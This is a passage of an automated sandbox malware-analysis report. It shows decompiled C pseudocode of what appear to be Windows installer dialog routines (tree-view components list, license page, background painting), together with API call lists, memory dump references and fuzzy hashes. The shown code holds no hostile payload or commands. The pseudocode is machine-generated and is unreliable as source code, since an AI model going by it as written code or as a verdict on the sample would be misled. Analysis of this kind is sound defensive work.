                                                                                      										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                      											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                      										} else {
                                                                                      											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							if(_a8 == 0x413) {
                                                                                      								L33:
                                                                                      								_t301 = 0 | _a8 != 0x00000413;
                                                                                      								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                                                      								_t295 = _t245;
                                                                                      								if(_t295 >= 0) {
                                                                                      									_t94 = _v24 + 8; // 0x8
                                                                                      									_t301 = _t245 * 0x818 + _t94;
                                                                                      									_t247 =  *_t301;
                                                                                      									if((_t247 & 0x00000010) == 0) {
                                                                                      										if((_t247 & 0x00000040) == 0) {
                                                                                      											_t248 = _t247 ^ 0x00000001;
                                                                                      										} else {
                                                                                      											_t254 = _t247 ^ 0x00000080;
                                                                                      											if(_t254 >= 0) {
                                                                                      												_t248 = _t254 & 0x000000fe;
                                                                                      											} else {
                                                                                      												_t248 = _t254 | 0x00000001;
                                                                                      											}
                                                                                      										}
                                                                                      										 *_t301 = _t248;
                                                                                      										E0040117D(_t295);
                                                                                      										_a12 = _t295 + 1;
                                                                                      										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                                                      										_a8 = 0x40f;
                                                                                      									}
                                                                                      								}
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							_t301 = _a16;
                                                                                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							goto L33;
                                                                                      						} else {
                                                                                      							goto L48;
                                                                                      						}
                                                                                      					} else {
                                                                                      						L48:
                                                                                      						if(_a8 != 0x111) {
                                                                                      							L56:
                                                                                      							if(_a8 == 0x200) {
                                                                                      								SendMessageW(_v8, 0x200, 0, 0);
                                                                                      							}
                                                                                      							if(_a8 == 0x40b) {
                                                                                      								_t225 =  *0x42d24c;
                                                                                      								if(_t225 != 0) {
                                                                                      									ImageList_Destroy(_t225);
                                                                                      								}
                                                                                      								_t226 =  *0x42d260;
                                                                                      								if(_t226 != 0) {
                                                                                      									GlobalFree(_t226);
                                                                                      								}
                                                                                      								 *0x42d24c = 0;
                                                                                      								 *0x42d260 = 0;
                                                                                      								 *0x434f60 = 0;
                                                                                      							}
                                                                                      							if(_a8 != 0x40f) {
                                                                                      								L90:
                                                                                      								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                                                      									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                      									ShowWindow(_v8, _t324);
                                                                                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                      								}
                                                                                      								goto L93;
                                                                                      							} else {
                                                                                      								E004011EF(_t301, 0, 0);
                                                                                      								_t198 = _a12;
                                                                                      								if(_t198 != 0) {
                                                                                      									if(_t198 != 0xffffffff) {
                                                                                      										_t198 = _t198 - 1;
                                                                                      									}
                                                                                      									_push(_t198);
                                                                                      									_push(8);
                                                                                      									E00404ED4();
                                                                                      								}
                                                                                      								if(_a16 == 0) {
                                                                                      									L75:
                                                                                      									E004011EF(_t301, 0, 0);
                                                                                      									_v36 =  *0x42d260;
                                                                                      									_t201 =  *0x434f28;
                                                                                      									_v64 = 0xf030;
                                                                                      									_v24 = 0;
                                                                                      									if( *0x434f2c <= 0) {
                                                                                      										L86:
                                                                                      										if( *0x434fbe == 0x400) {
                                                                                      											InvalidateRect(_v8, 0, 1);
                                                                                      										}
                                                                                      										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                                                                                      											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                                                      										}
                                                                                      										goto L90;
                                                                                      									}
                                                                                      									_t292 = _t201 + 8;
                                                                                      									do {
                                                                                      										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                      										if(_t207 != 0) {
                                                                                      											_t303 =  *_t292;
                                                                                      											_v72 = _t207;
                                                                                      											_v76 = 8;
                                                                                      											if((_t303 & 0x00000001) != 0) {
                                                                                      												_v76 = 9;
                                                                                      												_v60 =  &(_t292[4]);
                                                                                      												_t292[0] = _t292[0] & 0x000000fe;
                                                                                      											}
                                                                                      											if((_t303 & 0x00000040) == 0) {
                                                                                      												_t211 = (_t303 & 0x00000001) + 1;
                                                                                      												if((_t303 & 0x00000010) != 0) {
                                                                                      													_t211 = _t211 + 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												_t211 = 3;
                                                                                      											}
                                                                                      											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                      											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                      											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                      										}
                                                                                      										_v24 = _v24 + 1;
                                                                                      										_t292 =  &(_t292[0x206]);
                                                                                      									} while (_v24 <  *0x434f2c);
                                                                                      									goto L86;
                                                                                      								} else {
                                                                                      									_t293 = E004012E2( *0x42d260);
                                                                                      									E00401299(_t293);
                                                                                      									_t222 = 0;
                                                                                      									_t301 = 0;
                                                                                      									if(_t293 <= 0) {
                                                                                      										L74:
                                                                                      										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                      										_a16 = _t293;
                                                                                      										_a8 = 0x420;
                                                                                      										goto L75;
                                                                                      									} else {
                                                                                      										goto L71;
                                                                                      									}
                                                                                      									do {
                                                                                      										L71:
                                                                                      										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                      											_t301 = _t301 + 1;
                                                                                      										}
                                                                                      										_t222 = _t222 + 1;
                                                                                      									} while (_t222 < _t293);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                      							goto L93;
                                                                                      						} else {
                                                                                      							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                      							if(_t232 == 0xffffffff) {
                                                                                      								goto L93;
                                                                                      							}
                                                                                      							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                      							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                      								_t294 = 0x20;
                                                                                      							}
                                                                                      							E00401299(_t294);
                                                                                      							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                      							_a12 = _a12 | 0xffffffff;
                                                                                      							_a16 = 0;
                                                                                      							_a8 = 0x40f;
                                                                                      							goto L56;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					_v36 = 0;
                                                                                      					_v20 = 2;
                                                                                      					 *0x434f60 = _t291;
                                                                                      					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                                                      					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                                                      					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                                                      					_t297 = _t258;
                                                                                      					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                                                      					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                      					 *0x42d24c = _t260;
                                                                                      					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                      					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                                                      					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                      						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                      					}
                                                                                      					DeleteObject(_t297);
                                                                                      					_t298 = 0;
                                                                                      					do {
                                                                                      						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                      						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                      							if(_t298 != 0x20) {
                                                                                      								_v20 = 0;
                                                                                      							}
                                                                                      							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                      						}
                                                                                      						_t298 = _t298 + 1;
                                                                                      					} while (_t298 < 0x21);
                                                                                      					_t299 = _a16;
                                                                                      					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                      					_push(0x15);
                                                                                      					E00404499(_a4);
                                                                                      					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                      					_push(0x16);
                                                                                      					E00404499(_a4);
                                                                                      					_t300 = 0;
                                                                                      					_v16 = 0;
                                                                                      					if( *0x434f2c <= 0) {
                                                                                      						L19:
                                                                                      						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						_t319 = _v24 + 8;
                                                                                      						_v32 = _t319;
                                                                                      						do {
                                                                                      							_t278 =  &(_t319[0x10]);
                                                                                      							if( *_t278 != 0) {
                                                                                      								_v64 = _t278;
                                                                                      								_t279 =  *_t319;
                                                                                      								_v88 = _v16;
                                                                                      								_t311 = 0x20;
                                                                                      								_v84 = 0xffff0002;
                                                                                      								_v80 = 0xd;
                                                                                      								_v68 = _t311;
                                                                                      								_v44 = _t300;
                                                                                      								_v72 = _t279 & _t311;
                                                                                      								if((_t279 & 0x00000002) == 0) {
                                                                                      									if((_t279 & 0x00000004) == 0) {
                                                                                      										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                      									} else {
                                                                                      										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                      									}
                                                                                      								} else {
                                                                                      									_v80 = 0x4d;
                                                                                      									_v48 = 1;
                                                                                      									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                      									_v36 = 1;
                                                                                      									 *( *0x42d260 + _t300 * 4) = _t284;
                                                                                      									_v16 =  *( *0x42d260 + _t300 * 4);
                                                                                      								}
                                                                                      							}
                                                                                      							_t300 = _t300 + 1;
                                                                                      							_t319 =  &(_v32[0x818]);
                                                                                      							_v32 = _t319;
                                                                                      						} while (_t300 <  *0x434f2c);
                                                                                      						if(_v36 != 0) {
                                                                                      							L20:
                                                                                      							if(_v20 != 0) {
                                                                                      								E004044CE(_v8);
                                                                                      								goto L23;
                                                                                      							} else {
                                                                                      								ShowWindow(_v12, 5);
                                                                                      								E004044CE(_v12);
                                                                                      								L93:
                                                                                      								return E00404500(_a8, _a12, _a16);
                                                                                      							}
                                                                                      						}
                                                                                      						goto L19;
                                                                                      					}
                                                                                      				}
                                                                                      			}

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                      • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                      • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                        • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                      • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                      • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 2564846305-813528018
                                                                                      • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                      • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                      • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                      • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                      				intOrPtr _v8;
                                                                                      				int _v12;
                                                                                      				void* _v16;
                                                                                      				struct HWND__* _t56;
                                                                                      				intOrPtr _t69;
                                                                                      				signed int _t75;
                                                                                      				signed short* _t76;
                                                                                      				signed short* _t78;
                                                                                      				long _t92;
                                                                                      				int _t103;
                                                                                      				signed int _t110;
                                                                                      				intOrPtr _t113;
                                                                                      				WCHAR* _t114;
                                                                                      				signed int* _t116;
                                                                                      				WCHAR* _t117;
                                                                                      				struct HWND__* _t118;
                                                                                      
                                                                                      				if(_a8 != 0x110) {
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L13:
                                                                                      						if(_a8 != 0x4e) {
                                                                                      							if(_a8 == 0x40b) {
                                                                                      								 *0x42b234 =  *0x42b234 + 1;
                                                                                      							}
                                                                                      							L27:
                                                                                      							_t114 = _a16;
                                                                                      							L28:
                                                                                      							return E00404500(_a8, _a12, _t114);
                                                                                      						}
                                                                                      						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                      						_t114 = _a16;
                                                                                      						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                      							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                      							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                      							_v12 = _t103;
                                                                                      							_v16 = _t113;
                                                                                      							_v8 = 0x432ea0;
                                                                                      							if(_t103 - _t113 < 0x800) {
                                                                                      								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                      								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                      								_push(1);
                                                                                      								E00404907(_a4, _v8);
                                                                                      								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                      								_t114 = _a16;
                                                                                      							}
                                                                                      						}
                                                                                      						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                      								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                                                      							}
                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                      								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                                                      							}
                                                                                      							return 1;
                                                                                      						}
                                                                                      					}
                                                                                      					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                                                      						goto L27;
                                                                                      					} else {
                                                                                      						_t69 =  *0x42c240; // 0x7d1fcc
                                                                                      						_t29 = _t69 + 0x14; // 0x7d1fe0
                                                                                      						_t116 = _t29;
                                                                                      						if(( *_t116 & 0x00000020) == 0) {
                                                                                      							goto L27;
                                                                                      						}
                                                                                      						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                      						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                      						E004048E3();
                                                                                      						goto L13;
                                                                                      					}
                                                                                      				}
                                                                                      				_t117 = _a16;
                                                                                      				_t75 =  *(_t117 + 0x30);
                                                                                      				if(_t75 < 0) {
                                                                                      					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                                                                                      				}
                                                                                      				_t76 =  *0x434f38 + _t75 * 2;
                                                                                      				_t110 =  *_t76 & 0x0000ffff;
                                                                                      				_a8 = _t110;
                                                                                      				_t78 =  &(_t76[1]);
                                                                                      				_a16 = _t78;
                                                                                      				_v16 = _t78;
                                                                                      				_v12 = 0;
                                                                                      				_v8 = 0x404609;
                                                                                      				if(_t110 != 2) {
                                                                                      					_v8 = E004045CF;
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                      				_push(0x22);
                                                                                      				E00404499(_a4);
                                                                                      				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                      				_push(0x23);
                                                                                      				E00404499(_a4);
                                                                                      				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                      				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                      				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                      				E004044CE(_t118);
                                                                                      				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                      				_t92 =  *( *0x434f10 + 0x68);
                                                                                      				if(_t92 < 0) {
                                                                                      					_t92 = GetSysColor( ~_t92);
                                                                                      				}
                                                                                      				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                      				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                      				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                      				 *0x42b234 = 0;
                                                                                      				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                      				 *0x42b234 = 0;
                                                                                      				return 0;
                                                                                      			}


                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                      • GetSysColor.USER32(?), ref: 00404738
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                      • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                      • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                      • SetCursor.USER32(00000000), ref: 0040485A
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                      • SetCursor.USER32(00000000), ref: 00404876
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: Call$N
                                                                                      • API String ID: 3103080414-3438112850
                                                                                      • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                      • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                      • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                      • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                      				struct tagLOGBRUSH _v16;
                                                                                      				struct tagRECT _v32;
                                                                                      				struct tagPAINTSTRUCT _v96;
                                                                                      				struct HDC__* _t70;
                                                                                      				struct HBRUSH__* _t87;
                                                                                      				struct HFONT__* _t94;
                                                                                      				long _t102;
                                                                                      				signed int _t126;
                                                                                      				struct HDC__* _t128;
                                                                                      				intOrPtr _t130;
                                                                                      
                                                                                      				if(_a8 == 0xf) {
                                                                                      					_t130 =  *0x434f10;
                                                                                      					_t70 = BeginPaint(_a4,  &_v96);
                                                                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                      					_a8 = _t70;
                                                                                      					GetClientRect(_a4,  &_v32);
                                                                                      					_t126 = _v32.bottom;
                                                                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                      					while(_v32.top < _t126) {
                                                                                      						_a12 = _t126 - _v32.top;
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                      						_t87 = CreateBrushIndirect( &_v16);
                                                                                      						_v32.bottom = _v32.bottom + 4;
                                                                                      						_a16 = _t87;
                                                                                      						FillRect(_a8,  &_v32, _t87);
                                                                                      						DeleteObject(_a16);
                                                                                      						_v32.top = _v32.top + 4;
                                                                                      					}
                                                                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                      						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                      						_a16 = _t94;
                                                                                      						if(_t94 != 0) {
                                                                                      							_t128 = _a8;
                                                                                      							_v32.left = 0x10;
                                                                                      							_v32.top = 8;
                                                                                      							SetBkMode(_t128, 1);
                                                                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                      							_a8 = SelectObject(_t128, _a16);
                                                                                      							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                                                      							SelectObject(_t128, _a8);
                                                                                      							DeleteObject(_a16);
                                                                                      						}
                                                                                      					}
                                                                                      					EndPaint(_a4,  &_v96);
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t102 = _a16;
                                                                                      				if(_a8 == 0x46) {
                                                                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                      					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                                                      				}
                                                                                      				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                      			}














                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                      • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                      • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                      • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 72%
                                                                                      			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                      				struct _ITEMIDLIST* _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _t44;
                                                                                      				WCHAR* _t45;
                                                                                      				signed char _t47;
                                                                                      				signed int _t48;
                                                                                      				short _t59;
                                                                                      				short _t61;
                                                                                      				short _t63;
                                                                                      				void* _t71;
                                                                                      				signed int _t77;
                                                                                      				signed int _t78;
                                                                                      				short _t81;
                                                                                      				short _t82;
                                                                                      				signed char _t84;
                                                                                      				signed int _t85;
                                                                                      				void* _t98;
                                                                                      				void* _t104;
                                                                                      				intOrPtr* _t105;
                                                                                      				void* _t107;
                                                                                      				WCHAR* _t108;
                                                                                      				void* _t110;
                                                                                      
                                                                                      				_t107 = __esi;
                                                                                      				_t104 = __edi;
                                                                                      				_t71 = __ebx;
                                                                                      				_t44 = _a8;
                                                                                      				if(_t44 < 0) {
                                                                                      					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                                                                                      				}
                                                                                      				_push(_t71);
                                                                                      				_push(_t107);
                                                                                      				_push(_t104);
                                                                                      				_t105 =  *0x434f38 + _t44 * 2;
                                                                                      				_t45 = 0x432ea0;
                                                                                      				_t108 = 0x432ea0;
                                                                                      				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                                                      					_t108 = _a4;
